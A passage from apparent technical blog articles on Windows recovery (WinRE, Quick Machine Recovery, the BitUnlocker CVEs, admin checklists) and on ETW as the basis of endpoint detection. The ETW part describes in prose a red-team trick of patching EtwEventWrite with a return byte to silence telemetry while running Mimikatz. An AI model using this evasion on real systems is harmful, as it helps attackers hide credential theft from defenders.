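The new deployment is fully written before the rename happens, so a power cut at any point leaves the link pointing at one complete tree.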

Fedora Silverblue, Fedora CoreOS, Endless OS, and (since 2024) Fedora's bootc container-based desktops all ship OSTree by default [@fedora-silverblue]. Where OSTree excels is server fleets and developer workstations; where it struggles is layered third-party packages crossing deployments (the rebase/deploy friction) and the absence of a network-reachable in-recovery remediation analogue to QMR.

Traditional Linux: dracut + GRUB rescue + initramfs

The "manual safe-mode + delete-the-file" model. A skilled operator with shell access plus iLO / iDRAC / IPMI serial-over-LAN can repair a Linux box; everyone else is in trouble. The CrowdStrike-style incident response on traditional Linux would look exactly the same as it did on Windows: per-device, skilled operator, no automation. The Linux distributions that did avoid this fate are the OSTree-based atomic ones; the conventional ones are at the same operator-bound floor Windows just climbed off.

flowchart TB
  subgraph WIN[Windows: WinRE + QMR]
    WIN_WIM[winre.wim on recovery partition or in OS-volume folder] --> WIN_WU[Windows Update endpoint]
  end
  subgraph APL[Apple: macOS]
    APL_PR[Paired recoveryOS] --> APL_SNAP[APFS snapshot revert]
    APL_FB[Fallback recoveryOS / 1TR in Secure Enclave] --> APL_SNAP
  end
  subgraph CHR[ChromeOS]
    CHR_BOOTA[ROOT-A] --> CHR_FALLBACK[Boot loader falls back to other root]
    CHR_BOOTB[ROOT-B] --> CHR_FALLBACK
  end
  subgraph OS[Linux atomic / OSTree]
    OS_DEPNEW[New deployment] --> OS_PRIOR[Prior deployment retained for rollback]
  end

A head-to-head comparison

The dimensions that matter are: year shipped, in-recovery network capability, auto-remediation, signed-but-faulty-driver protection, per-device operator cost during a fleet event, trust floor, and encrypted-volume recovery story.

| Dimension | Windows WinRE + QMR | Apple SSV + recoveryOS | ChromeOS A/B + verified boot | Linux atomic (OSTree) | Conventional Linux |
| --- | --- | --- | --- | --- | --- |
| Year shipped | WinRE 2007 [@wiki-winre]; QMR 2025 [@ms-qmr] | SSV 2020; recoveryOS / 1TR 2020 [@apple-ssv, @apple-boot] | Verified Boot 2010 [@chromium-verified-boot] | OSTree 2012 (dev started 2011); rpm-ostree later [@ostree-atomic, @fedora-silverblue] | dracut 2009; GRUB 2 2009 |
| In-recovery network capability | Yes (WPA/WPA2 Wi-Fi or wired) [@ms-qmr] | Yes for reinstall; no targeted remediation | Yes for recovery image fetch | No standard pipeline | No |
| Auto-remediation without operator | Yes (one-time or looped) [@ms-qmr] | No (user confirms reinstall) | Yes (boot loader fallback) [@chromium-autoupdate] | No (user selects rollback in GRUB) | No |
| Protection against signed-but-faulty drivers | Behavioural via MVI 3.0 SDP + user-mode AV [@ms-mvi, @ms-wri-jun-2025] | DriverKit / System Extensions push third parties out of kernel | A/B rollback auto-recovers in one boot cycle | Layered package rolls back with deployment | None |
| Per-device operator cost in a fleet event | O(1) -- publish remediation once | O(N) -- each user reinstalls | O(0) -- automatic per device | O(N) -- each user selects rollback | O(N) -- skilled operator per device |
| Trust floor (unrecoverable without external media) | Corrupted `bootmgfw.efi`, missing WinRE, lost BitLocker key | Failed 1TR (very rare) | Both root partitions plus EEPROM corrupted | GRUB unreachable | GRUB unreachable |
| Encrypted-volume recovery story | BitLocker recovery key required [@ms-qmr] | FileVault key required if at-rest read needed | Stateful partition holds user data only | LUKS passphrase required | LUKS passphrase required |

The notable row is the per-device operator cost during a fleet event. QMR moves Windows from O(N) (pre-WRI) to O(1) (post-WRI). ChromeOS was already at O(0) thanks to the A/B rollback. Apple, conventional Linux, and OSTree-based Linux remain at O(N).

Key idea: The per-device operator cost row is the one Microsoft engineered WRI to change. QMR moves Windows from O(N) to O(1). ChromeOS was already at O(0) by virtue of A/B rollback. Apple, conventional Linux, and OSTree-based Linux remain at O(N). This is the empirical justification for the thesis that resilience is a security property: pre-WRI Windows, despite shipping BitLocker, HVCI, and Secure Boot, had a recoverability complexity class worse than ChromeOS. A faulty signed driver could exploit that gap to deny service at fleet scale.

Three vendors got to fleet-scale recovery earlier. Microsoft's catch-up move is constrained by what Microsoft does not control: OEM partition layouts, BIOS/UEFI variance, BitLocker key escrow. Apple ships hardware-plus-OS and Google ships ChromeOS against an OEM-certified hardware spec, both of which let those vendors specify partition layout end to end. Microsoft ships the OS and asks OEMs to follow the Image Configuration Designer defaults; some do, some do not. The KB5028997 workaround for "recovery partition too small for new winre.wim" is precisely the artefact of Microsoft not being able to mandate the layout [@ms-winre-tech-ref, @ms-kb5028997]. Those constraints set hard limits on what WRI can fix, and they are the reason the trust-floor row in the table is longer for Windows than for ChromeOS.

9. Theoretical Limits and the BitUnlocker Counter-Current

Two well-known results from the systems and security literature say that no fielded recovery primitive can be perfect, and Microsoft's own offensive-research team demonstrated, at Black Hat USA 2025 in August 2025, exactly which limit WRI runs into [@alon-leviev].

The trust-floor lower bound

No system can recover from corruption of all of its boot-path code without external media, because the verification step that detects corruption is itself part of the boot-path code. ChromeOS encodes this with a write-protected EEPROM that an attacker cannot rewrite without a hardware write-protect override [@chromium-verified-boot]; Apple encodes it with the 1TR environment anchored in the Secure Enclave [@apple-boot]; Windows encodes it by requiring the EFI System Partition plus a signed bootmgfw.efi. Below that floor, QMR, OSTree, and APFS snapshots are all helpless. The recovery surface bounded by what fits in write-protected non-volatile storage is the lower bound on automated recovery.

The end-to-end argument applied to recovery

Saltzer, Reed, and Clark's 1984 End-to-End Arguments in System Design [@saltzer-reed-clark-1984] argued that correctness checks belong at the endpoints of a communication system, not in intermediate nodes. Applied to update pipelines, the argument predicts that bug-free updates cannot be guaranteed by intermediate nodes (the vendor's QA fleet, the CDN, the Windows Update service). Correctness can only be observed at the endpoint. The corollary is that the probability of a faulty update reaching production cannot be driven to zero by any amount of pre-release testing; the platform's design must instead bound blast radius and time-to-recovery of the faulty updates that will inevitably ship. MVI 3.0's SDP bounds the first (deployment rings); QMR bounds the second (network-reachable remediation). The argument is identical to the canary / progressive-rollout pattern in Google's SRE Book Release Engineering chapter [@sre-release-eng].
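The blast-radius half of that argument can be made concrete with a toy rollout model. The ring names, ring sizes, and the halt-on-first-observed-fault rule below are illustrative assumptions, not the MVI 3.0 SDP requirements.

```javascript
// Progressive rollout over deployment rings. Ring sizes and the halt rule
// are illustrative assumptions, not the MVI 3.0 SDP requirements.
function rollOut(rings, isFaulty) {
  let exposed = 0;
  for (const ring of rings) {
    exposed += ring.devices;
    if (isFaulty) {
      // The fault is only observable at the endpoints, after the ring receives it.
      return { halted: true, haltedAt: ring.name, exposed };
    }
  }
  return { halted: false, haltedAt: null, exposed };
}

const rings = [
  { name: 'canary', devices: 100 },
  { name: 'early', devices: 10000 },
  { name: 'broad', devices: 1000000 },
];

const total = rings.reduce((n, r) => n + r.devices, 0);
const staged = rollOut(rings, true);
const allAtOnce = rollOut([{ name: 'everyone', devices: total }], true);

console.log(staged.exposed, allAtOnce.exposed);
```

Testing does not change whether the faulty update ships in either run; the rings only change how many endpoints see it before the rollout stops.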

The attack-surface trade-off

An auto-unlocking, network-reachable recovery environment expands the Trusted Computing Base. Every additional capability added to the recovery path is a new code path; a new code path is a new attack vector. The BitUnlocker research, by Netanel Ben Simon and Alon Leviev at Microsoft's Security Testing and Offensive Research (STORM) team [@alon-leviev, @ms-bitunlocker-blog], is the most pointed evidence we have that the trade-off is real.

STORM -- Security Testing and Offensive Research at Microsoft -- is the internal red team. Their job is to break Microsoft products before someone else does. BitUnlocker was first presented at Black Hat USA 2025 and DEF CON 33, both in August 2025; the four CVEs were patched in the July 8, 2025 cumulative update, ahead of the disclosure [@alon-leviev, @ms-bitunlocker-blog]. The patches landed one Patch Tuesday cycle before QMR went generally available [@ms-wri-ignite-2025]. In the same summer, the same vendor that made WinRE reachable from Windows Update made WinRE harder to abuse.

Trusted Computing Base (TCB): the set of hardware, firmware, and software components on which a system's security policy ultimately depends. A bug in a TCB component can undermine the entire security policy; everything outside the TCB is, by definition, untrusted relative to it. Recovery environments expand the TCB because they need privileged access to encrypted user state.

The four BitUnlocker CVEs are all rated CVSS 6.8:

CVE-2025-48804 [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via boot.sdi parsing.
CVE-2025-48003 [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via SetupPlatform.exe / Shift+F10 abuse during the WinRE Apps Scheduled Operation.
CVE-2025-48800 [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via tttracer.exe abuse during Offline Scanning.
CVE-2025-48818 [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via BCD parsing in the Online PBR exploit chain; the fourth pillar of the chain.

The published Microsoft Security blog post on BitUnlocker enumerates the architectural attack surfaces verbatim under three section headings: Attacking Boot.sdi Parsing, Attacking ReAgent.xml Parsing, and Attacking Boot Configuration Data (BCD) Parsing [@ms-bitunlocker-blog]. The premise is the same in every case. WinRE must read the OS volume's BitLocker recovery material to perform repairs. Therefore WinRE has code paths that, given the right inputs, can obtain the decrypted Full Volume Encryption Key. The four CVEs each find a parser or debugger inside WinRE whose input handling can be steered by an attacker with brief physical access to flip the recovery flow into a state where the decrypted FVEK becomes reachable.

flowchart TD
  PA[Physical access foothold] --> SDI[Attacking boot.sdi parsing -- CVE-2025-48804]
  PA --> RA[Attacking ReAgent.xml / SetupPlatform.exe -- CVE-2025-48003]
  PA --> BCD[Attacking BCD parsing / Online PBR -- CVE-2025-48818]
  PA --> TT[Abusing tttracer.exe Offline Scanning -- CVE-2025-48800]
  SDI --> FVEK[Reach decrypted FVEK on OS volume]
  RA --> FVEK
  BCD --> FVEK
  TT --> FVEK
  FVEK --> EX[BitLocker bypass; data exfiltration]

The encrypted-volume impossibility

Unattended recovery of an encrypted volume without the key is impossible. It is a security correctness requirement, not a limitation that engineering can fix. QMR explicitly does not bypass BitLocker [@ms-qmr]. Apple's FileVault, ChromeOS's TPM-bound user partition, and Linux LUKS all share this property; none of them gets to be exempt from the requirement that the key be present somewhere before the encrypted volume can be modified offline.

Note: Every additional capability added to the recovery path is an additional attack vector against the encrypted user state that the recovery path is privileged to access. QMR's network reachability is a feature for the operator and a feature for the attacker. The article's thesis is not that WRI makes Windows safer in absolute terms; it is that WRI moves the trade-off to a different curve. The same vendor making the recovery surface reachable from Windows Update is the vendor that has to harden it against itself.

The upper bound

ChromeOS A/B auto-rollback recovers a single device in one reboot cycle without operator action [@chromium-autoupdate]. This is the empirical upper bound on automation. No fielded platform recovers a signed-but-faulty boot path faster than one reboot per device. QMR matches the ChromeOS upper bound in the steady state once a remediation is published; the only thing QMR cannot do that ChromeOS does is recover from the first signed-but-faulty update before Microsoft has authored the remediation. The lower bound on time-to-fleet-recovery is set by the production lead time of Microsoft's own QA pipeline plus the time to author and publish the targeted patch.

Microsoft's own offensive-research team published the BitUnlocker chain one Patch Tuesday before QMR went generally available. That is not a coincidence; it is the price of moving WinRE up the trust ladder. The next question -- what has not been priced yet? -- belongs in the open-problems list.

10. Open Problems: Where Microsoft Has Not Committed

WRI is a current commitment with a published roadmap. The roadmap has explicit holes. Each of the six below is documented from a primary Microsoft source -- either by what the source says or, in the most honest cases, by what it does not say.

Network protocol surface in WinRE. The Microsoft Learn QMR page is explicit: only wired Ethernet and WPA/WPA2 password-based Wi-Fi are supported as of November 2025 [@ms-qmr]. Enterprise 802.1X and WPA3-Enterprise with device certificates are committed in the November 18, 2025 update as coming soon under the Wi-Fi 7 for Enterprise and WinRE-reads-from-Windows lines, but no shipping date is published [@ms-wri-ignite-2025]. For an enterprise on 802.1X, this is the most visible gap: a managed-fleet device on a corporate SSID cannot reach Windows Update from inside WinRE today.

Safe-mode hardening as a discrete deliverable. The phrase "safe mode hardening" has no first-party Microsoft anchor as a discrete WRI deliverable. The closest documented item is Administrator Protection, announced in the November 19, 2024 Ignite blog as a constraint on elevated-context behaviour [@ms-wri-ignite-2024]. That is not the same thing. The Safe Mode boot path that the CrowdStrike incident used to delete C-00000291*.sys was the same Safe Mode boot path that has existed since Windows NT; nothing in the WRI primary sources commits to changing what Safe Mode does or does not load. Honest reading: WRI re-prices the recovery surface around Safe Mode; it does not (yet) change Safe Mode itself.

Cross-vendor partition layout. The Microsoft Learn WinRE Technical Reference [@ms-winre-tech-ref] documents the recommended ICD-media layout but does not enforce it. Clean Windows Setup, OEM-installed Windows, and ICD-media-installed Windows produce different recovery-partition layouts, and the existence of KB5028997 (the well-known workaround for "recovery partition too small for the new winre.wim") is a direct consequence. ChromeOS and macOS do not have this problem because Google and Apple control the layout end to end. Microsoft chose, decades ago, not to.

Third-party MDM support for the WinRE plug-in model. The November 18, 2025 update describes the WinRE plug-in model as third-party-MDM-adoptable, but no third-party MDM vendor had shipped a plug-in or a QMR management surface as of that announcement [@ms-wri-ignite-2025]. Customers on JAMF, Workspace ONE, Tanium, or similar do not yet have a documented integration path. If the future of recovery is Intune-coupled, WRI's reach is bounded by Intune adoption.

BitLocker key escrow as a WRI deliverable. No WRI primary source ([@ms-wri-ignite-2024, @ms-wri-jun-2025, @ms-wri-ignite-2025]) names "BitLocker recovery key flows" as a discrete WRI deliverable. The adjacent items are: hardware-accelerated BitLocker on new devices starting spring 2026 [@ms-wri-ignite-2025]; the BitUnlocker CVE patches in July 2025 [@ms-bitunlocker-blog]; and the Entra ID self-service BitLocker recovery flow at aka.ms/aadrecoverykey [@ms-kb5042421]. The current state is that BitLocker key escrow is an Entra ID and Intune feature, not a WRI feature. QMR's value is bounded by BitLocker key availability for the encrypted-volume fraction of any fleet; a WRI deliverable that improved key escrow would compound QMR's benefit. None has been announced.

Recovery in air-gapped and sovereign environments. QMR routes through Windows Update. Air-gapped fleets, sovereign-cloud customers, and offline manufacturing networks cannot reach Windows Update from WinRE. The November 18, 2025 update mentions Connected Cache, but no QMR-Connected-Cache integration is committed [@ms-wri-ignite-2025]. For the high-assurance customer who today does not let manufacturing endpoints talk to the public Internet at all, QMR is a feature for someone else.

Note: The six items above are gaps in the roadmap, anchored either by what Microsoft has explicitly named as coming-soon or by the absence of a primary source. They are not features. The article distinguishes Microsoft-committed deliverables (cited to a primary source) from adjacent inferences. Readers reviewing WRI for their own fleets should do the same.

These six gaps are where the next year of WRI roadmap will be argued. None of them is closed; some are closed-soon. For the practitioner, the immediate question is what to do, today, with what is shipping right now.

11. Practitioner's Guide

Everything above is architecture. This section is the checklist.

1. Verify WinRE is provisioned. Run reagentc /info from an elevated prompt. The output should say Windows RE status: Enabled and point at a sensible WinRE location -- typically \\?\GLOBALROOT\device\harddisk0\partitionN\Recovery\WindowsRE or C:\Windows\System32\Recovery\WindowsRE. If the status is Disabled, run reagentc /enable. If the recovery partition is too small for a new winre.wim (a known issue with cumulative updates that grow the image, logged as System event ID 4502 with ErrorPhase 2), follow KB5028997 [@ms-kb5028997, @ms-winre-tech-ref].

The mitigation, in outline: disable WinRE temporarily (`reagentc /disable`); shrink the OS partition via `diskpart` by enough megabytes (250 MB minimum per Microsoft's published procedure) to host a larger recovery partition; recreate the recovery partition with the GPT Type ID `DE94BBA4-06D1-4D40-A16A-BFD50179D6AC` and the GPT attributes value `0x8000000000000001` that hides it from automounting; re-enable WinRE (`reagentc /enable`) so the new `winre.wim` is copied into the resized partition. The Microsoft Support KB article carries the exact `diskpart` commands [@ms-kb5028997], with the Windows RE Technical Reference as the architectural anchor [@ms-winre-tech-ref]. Test on a representative device first; the resize is not reversible without re-imaging.

2. Audit your QMR posture before turning it on. On Enterprise, Education, and managed Pro, cloud remediation is off by default [@ms-qmr]. Decide first; ring second; roll out third. The Intune Settings Catalog path is Remote Remediation > Enable Cloud Remediation. Pre-stage a WPA/WPA2 Wi-Fi credential via reagentc.exe /SetRecoverySettings if your recovery network is wireless.

3. Use the test-mode dry run. reagentc.exe /SetRecoveryTestmode followed by reagentc.exe /BootToRe triggers a simulated QMR cycle. The simulated remediation appears in Settings > Windows Update > Update history rather than mutating the production OS. Run it on a pilot ring before depending on QMR in a real incident [@ms-qmr].

4. Plan for BitLocker key availability. Ensure recovery keys are escrowed to Entra ID, not just printed on a card in a drawer. Enable the Entra ID self-service flow at aka.ms/aadrecoverykey so an unattended user can retrieve their own key during an incident [@ms-kb5042421].

5. Know the difference between Cloud Reset, QMR, and Autopilot Reset. Cloud Reset (in-Windows Reset this PC > Cloud download) reinstalls a running OS [@ms-pbr-overview]. QMR runs in WinRE before the OS boots, applying targeted patches from Windows Update [@ms-qmr]. Autopilot Reset re-provisions a bootable device via Intune. Three different tools, three different scenarios; do not confuse them in your runbook.

6. Watch for the November 2025 Intune signals. Once Intune surfaces WinRE state in the admin centre, build the muscle of looking for it. The roll-up that tells you "12 devices are in WinRE right now" is the operational primitive Microsoft did not have through July 2024 [@ms-wri-ignite-2025].

Note: Promote step 3 (the test-mode dry run) into your incident-response runbook now [@ms-qmr]. The time to discover that the recovery Wi-Fi SSID changed last quarter is not in the middle of a fleet-down event.

Note: QMR cannot decrypt the OS volume. It applies Windows Update patches that take effect on the next boot, but it cannot run against an encrypted volume's contents without the BitLocker recovery key being available [@ms-qmr]. If a device's BitLocker key is not escrowed to Entra ID and the user is not available to read it from a printout, QMR cannot help. Key escrow is upstream of recovery; treat it that way.

The reagentc /info output is short and uniform enough that a small script can classify the device's WinRE health. The block below sketches one in JavaScript pseudocode.

```javascript
// reagentc /info prints a small, stable text block, so a few regexes can classify it.
// String.raw keeps the backslashes in the sample path exactly as reagentc prints them.
const sampleOutput = String.raw`Windows Recovery Environment (Windows RE) and system reset configuration Information:

    Windows RE status:         Enabled
    Windows RE location:       \\?\GLOBALROOT\device\harddisk0\partition4\Recovery\WindowsRE
    Boot Configuration Data (BCD) identifier: a1b2c3d4-...-winre-guid
    Recovery image location:
    Recovery image index:      0
    Custom image location:
    Custom image index:        0

REAGENTC.EXE: Operation Successful.`;

function classify(output) {
  // [ \t]* rather than \s* keeps an empty field from swallowing the next line.
  const status = /Windows RE status:[ \t]*(\w+)/.exec(output)?.[1];
  const location = /Windows RE location:[ \t]*(\S*)/.exec(output)?.[1] ?? '';
  const partitionMatch = /partition(\d+)\\Recovery\\WindowsRE/i.exec(location);
  // Drive-letter form, e.g. C:\Windows\System32\Recovery\WindowsRE.
  const onOsVolume = /^[A-Z]:\\(?:.*\\)?Recovery\\WindowsRE/i.test(location);

  if (status !== 'Enabled') {
    return { status, action: 'reagentc /enable -- WinRE is not active' };
  }
  if (!partitionMatch && !onOsVolume) {
    return { status, action: 'Unknown layout; verify with diskpart and reagentc' };
  }
  if (partitionMatch) {
    return {
      status,
      layout: 'recovery-partition',
      partition: partitionMatch[1],
      note: 'If cumulative updates fail with insufficient-space errors, see KB5028997',
    };
  }
  return {
    status,
    layout: 'os-volume-recovery-folder',
    note: 'OEM-style layout; some Intune policies assume a separate partition. ' +
      'Confirm before relying on remote remediation.',
  };
}

console.log(classify(sampleOutput));
```

The practical questions answered, the article closes with a set of FAQs that catch the common misconceptions.

12. Frequently Asked Questions and Closing Thoughts

No. WRI's *Windows endpoint security platform* gives MVI partners a user-mode runtime so their detection logic does not have to live in a kernel-mode `.sys` file [@ms-wri-jun-2025, @ms-wri-ignite-2025]. Kernel-mode drivers as a class are not retired: the November 18, 2025 update is explicit that "graphics drivers, for example, will continue to run in kernel mode for performance reasons" [@ms-wri-ignite-2025], and the driver-resiliency playbook (compiler safeguards, driver isolation, DMA-remapping, higher signing bar) is precisely for the kernel-mode surface that will remain.

No. The Microsoft Learn QMR page is explicit that the recovery flow does not decrypt the OS volume [@ms-qmr]. If the BitLocker recovery key is unavailable, QMR cannot help. The recommended escrow path is Entra ID, with the user-facing self-service flow at `aka.ms/aadrecoverykey` [@ms-kb5042421].

No. The BCD Boot Options Reference enumerates every legal element on a boot entry, and there is no `/recovery` flag on `winload.efi` or `winload.exe` [@ms-bcd]. WinRE is selected by following the `recoverysequence` element of the OS-loader entry to a separate BCD entry whose `winpe` is `Yes` and whose `osdevice` mounts `winre.wim` from a `boot.sdi`-backed RAM disk. The entire handoff is inside the boot manager, before `winload.efi` runs.

No. The four CVE-2025-48800/-48003/-48804/-48818 advisories were patched in the July 8, 2025 cumulative update before QMR went generally available in August 2025 [@ms-bitunlocker-blog, @ms-wri-ignite-2025]. The patches addressed parser and debugger code paths inside WinRE; they did not remove WinRE's ability to read the OS volume's BitLocker recovery material, which is a feature WinRE needs in order to perform any repair on an encrypted volume.

No. The Secure Future Initiative (SFI), announced in November 2023, is Microsoft's company-wide security program. WRI is the Windows-specific workstream inside SFI that owns Windows availability, kernel resilience, and the recovery surface; the published WRI blogs frame it as the Windows pillar of SFI rather than a stand-alone effort [@ms-wri-ignite-2024, @ms-wri-jun-2025].

QMR will not connect. The Microsoft Learn page is explicit that only wired Ethernet and WPA/WPA2 password-based Wi-Fi are supported [@ms-qmr]. The November 18, 2025 update commits to WPA3-Enterprise with device certificates as part of the WinRE-reads-from-Windows networking work and the *Wi-Fi 7 for Enterprise* line, but it does not give a shipping date [@ms-wri-ignite-2025]. For now, enterprises whose recovery story depends on QMR over Wi-Fi must either stand up a dedicated WPA2-PSK recovery SSID or rely on wired recovery.

The code is mostly the same. What changed is the *policy* that lets WinRE call Windows Update without an operator at the keyboard. WinPE has shipped networking drivers since 2002 [@ms-winpe-intro], and `winre.wim` has been bootable from a recovery partition since 2009. The breakthrough is the commitment that the recovery environment is allowed to phone home -- and the surrounding program (MVI 3.0, the user-mode AV platform, Intune visibility) that makes it usable as a fleet-scale primitive.
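The `recoverysequence` hand-off described in the FAQ above can be modelled as a lookup between two entries. This is a toy model of the relationship only: the identifiers, the `path` value, and the `osdevice` string are made-up placeholders, and just the element names `recoverysequence`, `winpe`, and `osdevice` come from the text.

```javascript
// Toy BCD store. Identifiers and the ramdisk string are made-up placeholders;
// only the element names recoverysequence, winpe, and osdevice come from the text.
const store = {
  '{os-loader}': {
    path: '\\Windows\\system32\\winload.efi',
    recoverysequence: '{winre-entry}',
  },
  '{winre-entry}': {
    winpe: true,
    osdevice: 'ramdisk=[recovery]\\Recovery\\WindowsRE\\winre.wim,{sdi-options}',
  },
};

// Follow recoverysequence from the OS-loader entry and accept the target only
// if it looks like a WinPE entry whose osdevice is a RAM disk.
function resolveRecoveryEntry(bcd, loaderId) {
  const target = bcd[loaderId]?.recoverysequence;
  const entry = target ? bcd[target] : undefined;
  if (!entry || entry.winpe !== true || !/^ramdisk=/.test(entry.osdevice ?? '')) {
    return null;
  }
  return { id: target, ...entry };
}

console.log(resolveRecoveryEntry(store, '{os-loader}'));
```

Nothing in the lookup touches the loader's own `path`, which mirrors the point that the selection happens in the boot manager and not through a flag on `winload.efi`.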

Closing

The Windows Recovery Environment that worked perfectly on July 19, 2024 is the same Windows Recovery Environment that became Microsoft's most important security surface on August 1, 2025. The architecture did not change in the year between. The question we ask of it did.

The CrowdStrike incident did not invent the case for resilience as a security property. It priced it. Two months after the bug check signature csagent+0xe14ed made the rounds, Microsoft and the MVI cohort sat down at WESES to argue out what would become MVI 3.0 [@ms-weses]. Three months after that, the Ignite 2024 keynote committed to Quick Machine Recovery and to a user-mode antimalware platform [@ms-wri-ignite-2024]. Five months after that, the first QMR code shipped on the Beta Channel [@ms-qmr-insider-mar2025]. Twelve months after the incident, MVI 3.0 was binding [@ms-wri-ignite-2025]. Thirteen months after, QMR went generally available -- and BitUnlocker had been patched a month earlier in the July 2025 cumulative update. Sixteen months after, Microsoft published the rebuild-without-shipping-hardware roadmap [@ms-wri-ignite-2025].

WRI does not eliminate the trade-off between recoverability and attack surface. It moves the trade-off to a curve where the per-device cost of a fleet-down event is not bounded by human attention, and where the recovery code path is hardened by the same vendor's offensive-research team. Those are different curves than the ones the platform was on in July 2024. They are not the curves a textbook chapter on Windows internals would have predicted in 2014. They are also still the curves of a single vendor's program, anchored on a small number of blog posts and Microsoft Learn pages, and the work of validating them belongs in every fleet that depends on Windows for availability.

If WinRE worked perfectly on July 19, 2024 and that was the problem, the test of WRI is whether July 19, 2026 never makes the news.

ETW: How Windows 2000's Performance Hack Became the EDR Substrate

noreply@paragmali.com (Parag Mali) — Mon, 11 May 2026 00:00:00 GMT

Event Tracing for Windows is the high-rate, kernel-buffered observability bus that every modern Windows EDR consumes. A 2007-era architectural decision -- letting eight sessions read the same provider concurrently -- is what makes multi-vendor coexistence possible on a single host. Microsoft's `Microsoft-Windows-Threat-Intelligence` provider, gated behind Protected Process Light and an ELAM-signed Antimalware certificate since the Windows 10 RS-era, fires from the kernel side of memory-modifying syscalls and survives the user-mode `EtwEventWrite` patch class that defined red-team tradecraft from 2020 to 2022. The remaining attack surface -- BYOVD-driven kernel tampering -- is structurally narrowed by the Vulnerable Driver Blocklist enabled by default since Windows 11 22H2, with the residual sub-microsecond-payload gap remaining as ETW's irreducible "observation, not enforcement" limit.

1. Why didn't the patch silence Defender?

A red-team operator drops onto a 2026 Defender-protected box [@paragmali-com-war-it] and runs the move that worked five years ago. They locate ntdll!EtwEventWrite in the calling process, write the byte 0xC3 over the function prologue, and the calling process now silently fails to emit user-mode ETW events. The .NET CLR provider goes dark. Invoke-Mimikatz loads from execute-assembly without lighting up Microsoft-Windows-DotNETRuntime. Defender catches the credential dump [@paragmali-com-and-the] anyway, four seconds later, and the operator is on a SOC analyst's screen before the shellcode finishes running.

The patch worked. The .NET tracing provider in that process is mute. Attach a debugger and disassemble the function prologue: the first byte is now 0xC3, the near-return opcode [@felixcloutier-ret], and any caller falls straight back to its return address before producing a single event. The technique is the one Adam Chester documented in March 2020 [@xpn-hiding-dotnet], and to a generation of red teamers it has functioned as a near-universal ETW evasion ever since.

So why did Defender still fire?

Because Defender does not consume Microsoft-Windows-DotNETRuntime to detect a credential dump. It consumes Microsoft-Windows-Threat-Intelligence [@fluxsec-eti] -- a provider whose GUID is {f4e1897c-bb5d-5668-f1d8-040f4d8dd344}, whose events fire from inside the kernel side of memory-modifying syscalls, and whose producer the user-mode patcher cannot reach. The patch operated on an ntdll trampoline. The signal Defender used was emitted from a different layer entirely.

Key idea: Modern Windows EDR is layered on ETW, and the layers fail under different attacks.

That single asymmetry -- one provider goes dark to a one-byte patch, another fires from a place the patcher cannot touch -- is the spine of this article. Around it sits a 26-year story of one Microsoft team accidentally building the substrate of every modern Windows endpoint security product.

Event Tracing for Windows (ETW): A high-rate, kernel-buffered tracing facility built into Windows since 2000. Components called *providers* emit events tagged with a GUID; *controllers* configure trace sessions; *consumers* subscribe to live event streams or read recorded `.etl` files. ETW was designed for low-overhead developer diagnostics; it was retrofitted into the security-telemetry substrate that all modern Windows EDR products consume.

Endpoint Detection and Response (EDR): A class of endpoint security product that ingests behavioural telemetry (process creation, image load, memory allocation, network connection, registry change), correlates it against detection logic, and produces alerts and response actions. On Windows, the dominant EDRs (Microsoft Defender for Endpoint, CrowdStrike Falcon, SentinelOne, Elastic Defend, Wazuh, Sysmon-plus-SIEM) all build on ETW or on the same kernel callbacks ETW exposes to the user-mode tier.

To understand why a one-byte patch silences one provider but not another, we have to go back to a Windows 2000 design decision about per-CPU ring buffers.

2. ETW in Windows 2000: the performance problem that started it all

Imagine a 1999 network-driver author. A customer's NT4 production server is corrupting packets under load and the only available instrumentation is DbgPrint. Each call serialises through a kernel debug port, costs measurable percentage points of CPU on a busy box, and ships data to whoever happens to have the kernel debugger attached. The customer says no. The bug reproduces only at production traffic levels. You cannot ship enough printf-debugging through a debug port to find it.

That is the engineering pain Insung Park and Ricky Buch's team was solving when ETW shipped with Windows 2000. Their design moves -- recorded years later in the definitive April 2007 MSDN Magazine article on the Vista upgrade [@ms-park-buch-2007] -- still define the architecture two and a half decades later.

The first move was per-CPU ring buffers. A producer on CPU 7 writes to CPU 7's buffer with no lock contention against producers on other CPUs. Hot-path tracing on a 64-core machine does not serialise. The kernel allocates at least two buffers per logical processor [@ms-event-trace-props] so a producer can keep writing while a writer thread drains the previous buffer.

The second move was an asynchronous writer thread. The producer never blocks on disk I/O. It writes to its CPU's buffer and returns. A separate kernel thread drains buffers to file or hands them to a real-time consumer. ETW pushes the latency tax onto the consumer and the storage path, never onto the producer's hot loop.
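The first two moves can be sketched as a toy model. This is a minimal Python illustration, not ETW's implementation: the class name `PerCpuSession`, the four-events-per-buffer size, and the explicit `drain` call standing in for the kernel writer thread are all assumptions made for the example.

```python
from collections import deque


class PerCpuSession:
    """Toy model: each CPU owns its own small pool of fixed-size buffers."""

    def __init__(self, cpus, buffers_per_cpu=2, events_per_buffer=4):
        self.events_per_buffer = events_per_buffer
        # Spare buffers per CPU; one buffer per CPU is always the active one.
        self.free = [buffers_per_cpu - 1 for _ in range(cpus)]
        self.active = [[] for _ in range(cpus)]  # buffer currently being filled
        self.full = deque()                      # (cpu, buffer) awaiting the writer
        self.lost = 0

    def write(self, cpu, event):
        """Producer hot path: touch only this CPU's state and never wait on I/O."""
        buf = self.active[cpu]
        if len(buf) == self.events_per_buffer:
            if self.free[cpu] == 0:
                self.lost += 1  # no spare buffer left: the event is dropped
                return False
            self.free[cpu] -= 1
            self.full.append((cpu, buf))
            buf = self.active[cpu] = []
        buf.append(event)
        return True

    def drain(self, sink):
        """Stand-in for the writer thread: flush full buffers, then recycle them."""
        while self.full:
            cpu, buf = self.full.popleft()
            sink.extend(buf)
            self.free[cpu] += 1
```

With two buffers per CPU, a producer keeps writing into the spare buffer while the first one waits to be drained. In this model events are dropped only when both buffers fill before the writer catches up, and a busy CPU 0 never affects what CPU 1 can write.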

The third move was dynamic enable and disable. Park and Buch describe the resulting capability in one sentence:

ETW gives you the ability to enable and disable logging dynamically, making it easy to perform detailed tracing in production environments without requiring reboots or application restarts. -- Park & Buch, *MSDN Magazine*, April 2007 [@ms-park-buch-2007]

That sentence is the entire reason ETW could later become the EDR substrate. A producer compiles its trace points into shipping code at low cost; a controller flips them on at runtime when somebody actually wants the data. Without that property, you cannot build a security product that ships universal kernel tracing on a billion endpoints.
